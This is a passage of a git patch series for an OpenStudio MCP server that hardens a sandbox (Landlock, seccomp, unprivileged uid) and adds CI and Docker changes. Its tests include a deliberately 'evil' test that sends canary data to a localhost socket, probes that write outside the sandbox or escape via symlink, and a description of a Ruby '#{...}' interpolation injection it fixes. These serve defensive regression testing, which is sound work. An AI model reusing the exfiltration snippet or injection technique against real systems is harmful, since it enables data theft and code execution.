+        sys.executable, "-m", "mcp_server._sandbox_exec",
+        "--uid", "1001", "--gid", "1001",
+        "--landlock-ro", "/usr", "--landlock-ro", "/lib", "--landlock-ro", "/lib64",
+        "--landlock-rw", workdir,
+        "--", "cat", "/etc/hostname",  # /etc not granted -> must be denied
+    ]
+    try:
+        # Run the shim AS uid 1001 (non-root) to exercise the no-root path.
+        proc = subprocess.run(  # noqa: S603 - fixed argv, no shell
+            cmd, capture_output=True, text=True, cwd="/repo",
+            user=1001, group=1001, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, \
+            f"Landlock must block /etc read even without root; rc=0 out={out}"
+        assert "denied" in out, f"expected a permission-denied error; out={out}"
+    finally:
+        shutil.rmtree(workdir, ignore_errors=True)
+
+
+def test_local_host_files_protected(sandbox_server, full_server):
+    # Validates THE LOCAL ISSUE (dual-run, vuln -> fixed): the server bind-mounts
+    # the user's real host directories (here /repo). Unconfined, a measure an LLM
+    # authored writes straight into the user's checked-out repo on their machine;
+    # the sandbox blocks it. Benign — one canary file at the repo root, asserted
+    # PRESENT under off (the vulnerability) and ABSENT under auto (the fix),
+    # cleaned up either way. /repo is read-only in the sandbox allowlist, so the
+    # write is denied without breaking measures that legitimately read the repo.
+    tag = uuid.uuid4().hex[:8]
+    host_file = Path(f"/repo/_sandbox_local_canary_{tag}.txt")  # /repo = bind-mounted host source
+
+    async def _attempt_write(url):
+        async with http_session(url) as s:
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, "Ruby")
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": str(host_file), "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    try:
+        # --- Vulnerability: unconfined (off) writes into the user's host repo ---
+        off_info = asyncio.run(_attempt_write(sandbox_server[0]))
+        assert "PROBE wrote=" in off_info, f"off: expected a successful write; {off_info}"
+        assert host_file.is_file(), \
+            "VULN: an unconfined measure wrote into the user's bind-mounted host dir (/repo)"
+        host_file.unlink(missing_ok=True)
+
+        # --- Fixed: confined (auto) denies the write ---
+        auto_info = asyncio.run(_attempt_write(full_server[0]))
+        assert "PROBE write_err=" in auto_info, f"auto: expected the write to be denied; {auto_info}"
+        assert not host_file.is_file(), \
+            "FIXED: the sandbox (Landlock, /repo read-only) blocks writing to the user's host dir"
+    finally:
+        host_file.unlink(missing_ok=True)
+
+
+def test_sandbox_net_allow_permits_network(net_allow_server):
+    # Validates: OSMCP_SANDBOX_NET=allow leaves outbound networking open under the
+    # full tier (the knob is actually wired into wrap_cmd; default deny is tested
+    # by test_full_tier_blocks_read_escape_and_network).
+    listener = _CanaryListener()
+    listener.start()
+    try:
+        async def _run():
+            async with http_session(net_allow_server) as s:
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, "Ruby")
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": "", "escape_path": "",
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+        assert "PROBE net=sent" in info, f"net should be allowed; info=\n{info}"
+        listener._thread.join(timeout=5)
+        assert listener.received == b"CANARY_EXFIL", \
+            f"OSMCP_SANDBOX_NET=allow should permit the connection; got {listener.received!r}"
+    finally:
+        listener.close()
+
+
+def _trivial_body(language: str) -> str:
+    indent = "    " if language == "Ruby" else "        "
+    return f'{indent}runner.registerInfo("measure ok")'
+
+
+async def _create_trivial_measure(session, language: str) -> str:
+    res = unwrap(await session.call_tool("create_measure", {
+        "name": _unique("tm_" + ("rb" if language == "Ruby" else "py")),
+        "description": "Trivial measure for test_measure confinement check.",
+        "run_body": _trivial_body(language),
+        "language": language,
+        "arguments": [],
+    }))
+    assert res.get("ok") is True, f"create_measure failed: {res}"
+    return res["measure_dir"]
+
+
+_EVIL_TEST = (
+    "import socket\n"
+    "def test_zzz_exfil():\n"
+    "    try:\n"
+    "        s = socket.create_connection(('127.0.0.1', {port}), timeout=5)\n"
+    "        s.sendall(b'CANARY_EXFIL')\n"
+    "        s.close()\n"
+    "    except Exception:\n"
+    "        pass\n"
+)
+
+
+def test_measure_test_code_confined(sandbox_server, full_server):
+    # Validates THE COPILOT FINDING fix (dual-run): test_measure now runs untrusted
+    # test code under the sandbox. Inject a test that exfils to a localhost
+    # listener; under off it connects (vuln — test code was unconfined), under auto
+    # seccomp blocks it (fixed). Asserts on the listener (ground truth). The off
+    # leg is the falsifiability control: it proves the evil test actually runs.
+    async def _run_test_measure(url, port):
+        async with http_session(url) as s:
+            measure_dir = await _create_trivial_measure(s, "Python")
+            evil = Path(measure_dir) / "tests" / "test_zzz_evil.py"
+            evil.write_text(_EVIL_TEST.format(port=port), encoding="utf-8")
+            await s.call_tool("test_measure", {"measure_dir": measure_dir})
+
+    # --- Vulnerability: off lets the (untrusted) test code reach the network ---
+    off_listener = _CanaryListener()
+    off_listener.start()
+    try:
+        asyncio.run(_run_test_measure(sandbox_server[0], off_listener.port))
+        off_listener._thread.join(timeout=5)
+        assert off_listener.received == b"CANARY_EXFIL", \
+            "VULN: test_measure ran test code that reached the network under off"
+    finally:
+        off_listener.close()
+
+    # --- Fixed: auto confines test_measure (seccomp blocks the exfil) ---
+    auto_listener = _CanaryListener()
+    auto_listener.start()
+    try:
+        asyncio.run(_run_test_measure(full_server[0], auto_listener.port))
+        auto_listener._thread.join(timeout=5)
+        assert auto_listener.received == b"", \
+            f"FIXED: test_measure code must be net-confined under auto; got {auto_listener.received!r}"
+    finally:
+        auto_listener.close()
+
+
+# ---------------------------------------------------------------------------
+# Codex review reproductions (confirm-now): each PASSES today by demonstrating
+# the open hole, run under the FULL tier (OSMCP_SANDBOX=auto) so it proves the
+# sandbox does NOT yet stop it. Tagged with the Codex finding id + how to INVERT
+# the assertion once the fix lands. All use canaries/decoys only.
+# Not yet reproduced here (need heavier setup): C1 reporting-measure test path
+# (needs a completed sim/SQL), C2 `openstudio measure -u` Ruby injection,
+# H1 seccomp arch fail-open (needs an i386/x32 binary), H2 fail-open on a kernel
+# without Landlock.
+# ---------------------------------------------------------------------------
+
+def test_c3_escaping_symlink_rejected(full_server):
+    # Codex C3 (FIXED): a measure dir containing a symlink that escapes the measure
+    # root is rejected before any copy — no host-file content is inlined into the
+    # readable run dir.
+    url, _ = full_server
+    tag = uuid.uuid4().hex[:8]
+    secret_file = Path(f"/opt/_sbx_c3_{tag}.txt")  # outside the measure dir
+    secret_file.write_text(f"C3_SECRET_{tag}", encoding="utf-8")
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                await setup_example(s, _unique())
+                mdir = Path(await _create_trivial_measure(s, "Ruby"))
+                (mdir / "evil_link.txt").symlink_to(secret_file)  # escaping symlink
+                return unwrap(await s.call_tool("apply_measure", {"measure_dir": str(mdir)}))
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "symlink" in str(res.get("error", "")).lower(), \
+            f"C3: an escaping symlink in the measure dir must be rejected; got {res}"
+    finally:
+        secret_file.unlink(missing_ok=True)
+
+
+def test_c4_run_simulation_rejects_out_of_root_osm(full_server):
+    # Codex C4 (FIXED): run_simulation rejects an OSM outside all allowed roots
+    # (no staging arbitrary host files into the run dir).
+    url, _ = full_server
+    tag = uuid.uuid4().hex[:8]
+    outside_osm = Path(f"/opt/_sbx_c4_{tag}.osm")  # outside every allowed root
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                cr = unwrap(await s.call_tool("create_example_osm", {"name": _unique()}))
+                assert cr["ok"] is True, cr
+                shutil.copy2(cr["osm_path"], outside_osm)  # a valid OSM at a host path
+                res = unwrap(await s.call_tool("run_simulation", {
+                    "osm_path": str(outside_osm), "epw_path": EPW_PATH}))
+                if res.get("ok") and res.get("run_id"):
+                    await s.call_tool("cancel_run", {"run_id": res["run_id"]})
+                return res
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \
+            f"C4: out-of-root OSM must be rejected; got {res}"
+    finally:
+        outside_osm.unlink(missing_ok=True)
+
+
+def test_c5_test_measure_rejects_out_of_root_dir(full_server):
+    # Codex C5 (FIXED): test_measure rejects a measure_dir outside all allowed
+    # roots (before it would chown / Landlock-grant an arbitrary path).
+    url, _ = full_server
+    outside = Path(tempfile.mkdtemp(prefix="osmcp_c5_"))
+    decoy = outside / "set_building_name"
+    shutil.copytree(_FIXTURE_MEASURE, decoy)
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                await setup_example(s, _unique())
+                return unwrap(await s.call_tool("test_measure", {"measure_dir": str(decoy)}))
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \
+            f"C5: out-of-root measure_dir must be rejected; got {res}"
+    finally:
+        shutil.rmtree(outside, ignore_errors=True)
+
+
+@pytest.fixture(scope="module")
+def uid0_server():
+    """Full tier but with a misconfigured sandbox uid of 0 (OSMCP_SANDBOX_UID=0)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    with http_server({
+        "MCP_AUTH": "none", "OSMCP_SANDBOX": "auto",
+        "OSMCP_SANDBOX_UID": "0", "OSMCP_SANDBOX_GID": "0",
+    }) as (url, _proc):
+        yield url
+
+
+def test_h5_sandbox_uid_zero_clamped(uid0_server):
+    # Codex H5 (FIXED): OSMCP_SANDBOX_UID=0 is rejected/clamped to the safe default,
+    # so confined code never runs as root even with the bad override.
+    async def _run():
+        async with http_session(uid0_server) as s:
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, "Ruby")
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": "", "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+    assert "PROBE uid=0" not in info, \
+        f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}"
+    assert "PROBE uid=1001" in info, \
+        f"H5: sandbox uid must clamp to the safe default 1001; info=\n{info}"

From 6efac2ef95ae85740b5de61d7e1cad9270059da6 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 18:07:51 -0400
Subject: [PATCH 16/26] ci(security): run integration suite under
 OSMCP_SANDBOX=auto explicitly; add sandbox user to arm64 image

Both amd64 + arm64 integration test jobs now set OSMCP_SANDBOX=auto (no longer relying on the code default). Dockerfile.arm64 gains the unprivileged sandbox user for parity.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .github/workflows/ci.yml | 10 ++++++++--
 docker/Dockerfile.arm64  |  4 ++++
 2 files changed, 12 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 6ffc936..bc2f40c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -115,6 +115,9 @@ jobs:
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
+          # Run the integration suite confined (explicit, not via the code default).
+          # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp.
+          OSMCP_SANDBOX: "auto"
         run: |
           mkdir -p runs
           case ${{ matrix.shard }} in
@@ -126,7 +129,7 @@ jobs:
           esac
           docker run --rm \
             -v "$PWD:/repo" -v "$PWD/runs:/runs" \
-            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             $EXTRA_ENV \
             openstudio-mcp:arm64 bash -lc "cd /repo && pytest -vv -s $FILES"
 
@@ -182,6 +185,9 @@ jobs:
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
+          # Run the integration suite confined (explicit, not via the code default).
+          # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp.
+          OSMCP_SANDBOX: "auto"
         run: |
           mkdir -p runs
           case ${{ matrix.shard }} in
@@ -215,6 +221,6 @@ jobs:
           esac
           docker run --rm \
             -v "$PWD:/repo" -v "$PWD/runs:/runs" \
-            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             $EXTRA_ENV \
             openstudio-mcp:dev bash -lc "cd /repo && pytest -vv -s $FILES"
diff --git a/docker/Dockerfile.arm64 b/docker/Dockerfile.arm64
index 86808b8..b4fc60e 100644
--- a/docker/Dockerfile.arm64
+++ b/docker/Dockerfile.arm64
@@ -26,6 +26,10 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     ruby-full \
     && rm -rf /var/lib/apt/lists/*
 
+# Unprivileged account that confined measure/simulation subprocesses drop to
+# (parity with docker/Dockerfile; see mcp_server/_sandbox_exec.py).
+RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox
+
 # OpenStudio arm64 — official NREL .deb. Pulls in libstdc++ etc. as deps.
 RUN curl -fSL \
       "https://github.com/NREL/OpenStudio/releases/download/v${OPENSTUDIO_VERSION}/OpenStudio-${OPENSTUDIO_VERSION}+${OPENSTUDIO_SHA}-Ubuntu-24.04-arm64.deb" \

From a38a280dbe9ca0bf4a280383243829f5a060a99b Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 18:11:58 -0400
Subject: [PATCH 17/26] ci(security): run sandbox suite on arm64 too (matrix
 amd64+arm64)

Validates the aarch64 seccomp BPF (different syscall numbers) and Landlock confinement on the native arm64 runner, not just amd64.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .github/workflows/security.yml | 27 +++++++++++++++++++--------
 1 file changed, 19 insertions(+), 8 deletions(-)

diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml
index c3688e1..ecb595c 100644
--- a/.github/workflows/security.yml
+++ b/.github/workflows/security.yml
@@ -3,9 +3,9 @@ name: security
 # Dedicated workflow for the security / sandbox-confinement suite
 # (tests/test_sandbox.py), kept separate from the main `ci` shards so the
 # security tests run and report on their own. Runs the full sandbox tier
-# (OSMCP_SANDBOX=auto); individual tests still pin their own mode per fixture
-# (off/posix/auto), so this exercises every tier and reports how the kernel
-# backends (Landlock + seccomp) behave on the GitHub runner.
+# (OSMCP_SANDBOX=auto) on BOTH amd64 and arm64 — the seccomp BPF and Landlock
+# use arch-specific syscall numbers, so arm64 must be exercised explicitly.
+# Individual tests still pin their own mode per fixture (off/posix/auto).
 
 on:
   push:
@@ -15,14 +15,25 @@ on:
 
 jobs:
   security-tests:
-    runs-on: ubuntu-latest
+    name: security-tests (${{ matrix.arch }})
+    runs-on: ${{ matrix.runner }}
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - arch: amd64
+            runner: ubuntu-latest
+            dockerfile: docker/Dockerfile
+          - arch: arm64
+            runner: ubuntu-24.04-arm
+            dockerfile: docker/Dockerfile.arm64
     steps:
       - uses: actions/checkout@v4
 
-      - name: Build image
-        run: docker build -f docker/Dockerfile -t openstudio-mcp:dev .
+      - name: Build image (${{ matrix.arch }})
+        run: docker build -f ${{ matrix.dockerfile }} -t openstudio-mcp:dev .
 
-      - name: Run security suite (if present)
+      - name: Run security suite (${{ matrix.arch }})
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
@@ -34,7 +45,7 @@ jobs:
             echo "No security tests present in this checkout — nothing to run."
             exit 0
           fi
-          echo "Running security tests under OSMCP_SANDBOX=$OSMCP_SANDBOX: $FILES"
+          echo "[${{ matrix.arch }}] security tests under OSMCP_SANDBOX=$OSMCP_SANDBOX: $FILES"
           docker run --rm -v "$PWD:/repo" -v "$PWD/runs:/runs" \
             -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             openstudio-mcp:dev bash -lc "cd /repo && pytest -vv $FILES"

From e565a953afd95afb50c36ba8e1d82daa9fe688d4 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 18:15:44 -0400
Subject: [PATCH 18/26] ci: add arch-sensitive test set to arm64 (shard 2)

arm64 now runs, under OSMCP_SANDBOX=auto: shard 1 (SEB4 sim/EUI + weather/loops) and shard 2 (SWIG-memleak + stdout suppression [deb-vs-wheel], measure apply/authoring [Ruby/Python exec + bundler], an HVAC EnergyPlus sim). Security PoC runs on arm64 via the security workflow.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .github/workflows/ci.yml | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index bc2f40c..fe15393 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -92,14 +92,15 @@ jobs:
           retention-days: 1
 
   arm64-test:
-    # Start of arm64 test matrix: shard 1 only (real EnergyPlus sim via SEB4 OSW,
-    # asserts EUI ≈ 1.875 ± 2%). Expand to [1..5] once arm64 sim parity is proven.
+    # arm64 test matrix: shard 1 = real EnergyPlus sim via SEB4 OSW (asserts EUI
+    # ≈ 1.875 ± 2%) + weather/loops; shard 2 = the arch-sensitive set (SWIG/stdout
+    # deb-vs-wheel, measure exec/bundler, an HVAC sim). Both run confined (auto).
     needs: arm64-build
     runs-on: ubuntu-24.04-arm
     strategy:
       fail-fast: false
       matrix:
-        shard: [1]
+        shard: [1, 2]
     steps:
       - uses: actions/checkout@v4
 
@@ -126,6 +127,15 @@ jobs:
               FILES="tests/test_example_workflows.py tests/test_component_properties.py tests/test_comstock.py tests/test_weather.py tests/test_weather_files.py tests/test_mcp_seb4.py tests/test_create_constructions.py tests/test_loop_operations.py tests/test_plant_loop_demand.py tests/test_sizing_properties.py tests/test_skill_retrofit.py tests/test_integration.py"
               EXTRA_ENV="-e MCP_OSW_PATH=tests/assets/SEB_model/SEB4_baseboard/workflow.osw -e EXPECTED_EUI=1.8750760248144998 -e EXPECTED_EUI_RTOL=0.02 -e EXPECTED_EUI_ATOL=0.0"
               ;;
+            2)
+              # arm64 arch-sensitive coverage (the deb-vs-wheel / native-ISA risks):
+              #  - SWIG memleak + stdout suppression (wheel-vs-deb behaviour)
+              #  - measure apply + authoring (Ruby/Python exec + bundler on arm64)
+              #  - an HVAC EnergyPlus sim (arm64 E+ build correctness)
+              # (The sandbox/security PoC runs on arm64 via the security workflow.)
+              FILES="tests/test_swig_memleak_cleanup.py tests/test_stdout_logger_silence.py tests/test_measures.py tests/test_measure_authoring.py tests/test_hvac_supply_sim.py"
+              EXTRA_ENV=""
+              ;;
           esac
           docker run --rm \
             -v "$PWD:/repo" -v "$PWD/runs:/runs" \

From 5da03f4658423011693ceb4b615855d620edec86 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 18:38:29 -0400
Subject: [PATCH 19/26] fix(ci): set RUBYLIB on arm64 image so measure tests
 can require openstudio

arm64-test shard 2 failed: 5 test_measure_authoring cases hit
`require': cannot load such file -- openstudio (LoadError)`. test_measure runs
Ruby minitest via raw `ruby -I .` (openstudio measure -r doesn't run minitest),
so system ruby needs RUBYLIB pointing at the OpenStudio Ruby bindings. The amd64
nrel/openstudio base sets this; the arm64 (ubuntu+.deb) image never did, so the
path was only exposed once arm64 shard 2 started running these tests.

Symlink the install's Ruby dir to a stable /usr/local path and set RUBYLIB to it
(parity with amd64). Both under /usr/local, which the sandbox Landlock policy
already grants; RUBYLIB is already in the sandbox env allowlist.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docker/Dockerfile.arm64 | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/docker/Dockerfile.arm64 b/docker/Dockerfile.arm64
index b4fc60e..929eca9 100644
--- a/docker/Dockerfile.arm64
+++ b/docker/Dockerfile.arm64
@@ -44,9 +44,14 @@ RUN curl -fSL \
 # The nrel/openstudio base image does this; the .deb does not. Without it,
 # every measure-based MCP tool fails at runtime (ComStock, common-measures,
 # apply_measure). Mirrors NREL/docker-openstudio's /var/oscli setup.
+# A stable symlink (/usr/local/openstudio-Ruby) is created in the RUN below so
+# RUBYLIB can be a fixed ENV — the install dir name carries a build-SHA suffix.
+# Both link and target live under /usr/local, which the sandbox Landlock policy
+# grants read+exec.
 RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VERSION}*" -type d | head -n1) \
     && test -n "$OPENSTUDIO_FOLDER" || { echo "openstudio install dir not found"; exit 1; } \
     && echo "OPENSTUDIO_FOLDER=$OPENSTUDIO_FOLDER" \
+    && ln -sfn "$OPENSTUDIO_FOLDER/Ruby" /usr/local/openstudio-Ruby \
     && gem install bundler -v ${OS_BUNDLER_VERSION} --no-document \
     && gem install zip --no-document \
     && mkdir -p /var/oscli \
@@ -57,6 +62,12 @@ RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VER
     && bundle _${OS_BUNDLER_VERSION}_ install --path=gems --without=native_ext --jobs=4 --retry=3 \
     && test -d /var/oscli/gems || { echo "/var/oscli/gems missing after bundle install"; exit 1; }
 
+# Let the system `ruby` resolve `require 'openstudio'` (parity with the amd64
+# nrel/openstudio base, which sets RUBYLIB to the install's Ruby dir). test_measure
+# runs Ruby unit tests via `ruby -I .` directly — `openstudio measure -r` does not
+# run minitest — so without this the measure tests fail with a LoadError.
+ENV RUBYLIB=/usr/local/openstudio-Ruby
+
 # ComStock measures (openstudio-standards-based templates for space types,
 # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB).
 ARG COMSTOCK_TAG=2025-3

From d2860f4abd300d65b239cf9fbaaaa7b2ead01547 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 20:45:18 -0400
Subject: [PATCH 20/26] =?UTF-8?q?fix(security):=20batch=201=20=E2=80=94=20?=
 =?UTF-8?q?Ruby=20interpolation=20RCE,=20fail-closed=20mode,=20env/timeout?=
 =?UTF-8?q?=20hardening?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Codex gpt-5.5 + Copilot round-2 review fixes (low-risk):
- #1 (critical RCE): _escape_ruby_str now escapes '#'. A measure description/
  default/choice value with '#{...}' was live Ruby interpolation in a double-quoted
  literal, executed when `openstudio measure -u` runs (unsandboxed, as root).
- #6: unknown OSMCP_SANDBOX value (typo) normalized to 'auto' (fail-closed) instead
  of silently downgrading enabled-but-not-full to posix.
- #7: drop the bare 'LC_' env allowlist prefix; enumerate standard locale categories
  so an LC_-prefixed host secret (e.g. LC_API_TOKEN) can't leak to measure code.
- #9: _safe_float rejects NaN/inf so a non-finite SIM_TIMEOUT can't silently disable
  the wall-clock cap.
- Copilot: _ARG_NAME_RE requires lowercase-leading (uppercase -> Ruby dynamic
  constant assignment SyntaxError in generated arguments()).
- Copilot: _enforce_timeouts skips a dead-but-unreaped pid (_pid_alive) so a finished
  run isn't force-failed; left for the reaper to classify by exit code.

Tests: 6 added (test_sandbox.py x3, test_measure_authoring.py x2, test_sim_queue.py x1).
Verified 6 new + full measure_authoring + sim_queue (38 passed) under OSMCP_SANDBOX=auto.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/config.py                          | 32 ++++++++++-
 mcp_server/sandbox.py                         |  7 ++-
 .../skills/measure_authoring/operations.py    | 20 +++++--
 mcp_server/skills/simulation/operations.py    |  4 ++
 tests/test_measure_authoring.py               | 55 +++++++++++++++++++
 tests/test_sandbox.py                         | 41 ++++++++++++++
 tests/test_sim_queue.py                       | 25 +++++++++
 7 files changed, 177 insertions(+), 7 deletions(-)

diff --git a/mcp_server/config.py b/mcp_server/config.py
index 56bbfc3..a541f2e 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -1,6 +1,8 @@
 from __future__ import annotations
 
+import math
 import os
+import sys
 from pathlib import Path
 
 RUN_ROOT = Path(os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs"))).resolve()
@@ -14,9 +16,14 @@ def _safe_int(env_val: str, default: int) -> int:
 
 def _safe_float(env_val: str, default: float) -> float:
     try:
-        return float(env_val)
+        v = float(env_val)
     except (ValueError, TypeError):
         return default
+    # Reject NaN/inf: a non-finite SIM_TIMEOUT would make both `<= 0` and the
+    # elapsed-time comparison false, silently disabling timeout enforcement.
+    if not math.isfinite(v):
+        return default
+    return v
 
 _raw_concurrency = os.environ.get("OPENSTUDIO_MCP_MAX_CONCURRENCY", os.environ.get("OSMCP_MAX_CONCURRENCY", "1"))
 MAX_CONCURRENCY = _safe_int(_raw_concurrency, 1)
@@ -66,7 +73,28 @@ def _safe_float(env_val: str, default: float) -> float:
 # Secure by default. Degrades loudly: the unprivileged layers (Landlock/seccomp)
 # apply even for a non-root local server; on a platform without a kernel backend
 # (macOS/Windows bare installs) it falls back to clean-env only and logs a notice.
-SANDBOX_MODE = os.environ.get("OSMCP_SANDBOX", "auto").strip().lower()
+_SANDBOX_OFF_ALIASES = frozenset({"", "off", "0", "false", "no"})
+_SANDBOX_ON_MODES = frozenset({"posix", "auto", "full", "landlock"})
+
+
+def _normalize_sandbox_mode(raw: str) -> str:
+    """Map OSMCP_SANDBOX to a known mode, FAIL-CLOSED on an unrecognized value.
+
+    A typo like ``atuo`` would otherwise leave ``enabled()`` True but ``_full()``
+    False — silently downgrading from the default Landlock+seccomp tier to
+    posix-only. To never weaken confinement on a typo, force the most-restrictive
+    ``auto`` and warn loudly. Off-aliases are honored as-is (disabling is explicit).
+    """
+    v = (raw or "").strip().lower()
+    if v in _SANDBOX_OFF_ALIASES or v in _SANDBOX_ON_MODES:
+        return v
+    print(f"[sandbox] unknown OSMCP_SANDBOX={raw!r}; falling back to 'auto' "
+          "(fail-closed). Valid values: off, posix, auto, full, landlock.",
+          file=sys.stderr)
+    return "auto"
+
+
+SANDBOX_MODE = _normalize_sandbox_mode(os.environ.get("OSMCP_SANDBOX", "auto"))
 # Network policy for confined subprocesses: deny (default) blocks outbound TCP
 # once the seccomp backend lands; allow leaves it open (trusted/BCL deployments).
 SANDBOX_NET = os.environ.get("OSMCP_SANDBOX_NET", "deny").strip().lower()
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 556a1bc..335ff5e 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -69,8 +69,13 @@
     # BUNDLE_<HOST>__<COM> auth tokens) into untrusted measure code.
     "BUNDLE_WITHOUT", "BUNDLE_PATH", "BUNDLE_GEMFILE", "BUNDLE_FROZEN",
     "BUNDLE_DEPLOYMENT", "GEM_HOME", "GEM_PATH",
+    # Standard POSIX locale categories ONLY — enumerated, never prefix-matched: a
+    # bare LC_ prefix would also copy a host secret named e.g. LC_API_TOKEN.
+    "LC_CTYPE", "LC_NUMERIC", "LC_TIME", "LC_COLLATE", "LC_MONETARY",
+    "LC_MESSAGES", "LC_PAPER", "LC_NAME", "LC_ADDRESS", "LC_TELEPHONE",
+    "LC_MEASUREMENT", "LC_IDENTIFICATION",
 })
-_ENV_ALLOW_PREFIXES = ("LC_",)  # locale only (e.g. LC_CTYPE); never a secret prefix
+_ENV_ALLOW_PREFIXES: tuple[str, ...] = ()  # no prefix matching — exact names only
 
 
 def enabled() -> bool:
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 39bd079..3ef1067 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -33,7 +33,10 @@ def custom_measures_dir() -> Path:
 _MEASURE_NAME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]{0,99}$")
 # Argument names become bare Ruby/Python identifiers in generated code — they must
 # be plain identifiers, never arbitrary text (else code injection at generation).
-_ARG_NAME_RE = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_]{0,63}$")
+# Must start lowercase/underscore: an uppercase-leading name (e.g. "Foo") is a Ruby
+# *constant*, so `Foo = ...` inside a method is a "dynamic constant assignment"
+# SyntaxError that breaks the generated Ruby measure.
+_ARG_NAME_RE = re.compile(r"^[a-z_][a-zA-Z0-9_]{0,63}$")
 
 # Argument type -> SDK factory method name suffix
 _ARG_MAKERS = {
@@ -87,8 +90,15 @@ def _to_class_name(snake: str) -> str:
 
 
 def _escape_ruby_str(s: str) -> str:
-    """Escape a string for safe embedding in a Ruby double-quoted string."""
-    return s.replace("\\", "\\\\").replace('"', '\\"')
+    """Escape a string for safe embedding in a Ruby double-quoted string.
+
+    Besides backslash and the closing quote, `#` MUST be escaped: in a Ruby
+    double-quoted literal `#{...}` (and `#@`, `#$`) is interpolation, so an
+    un-escaped `#` in user-controlled text (description / default / choice value)
+    is arbitrary Ruby execution when the generated measure runs `openstudio
+    measure -u`. `\\#` yields a literal `#`.
+    """
+    return s.replace("\\", "\\\\").replace('"', '\\"').replace("#", "\\#")
 
 
 def _escape_python_str(s: str) -> str:
@@ -101,7 +111,9 @@ def _checked_arg_name(name: str) -> str:
     Ruby/Python variable in generated code, so arbitrary text would be code
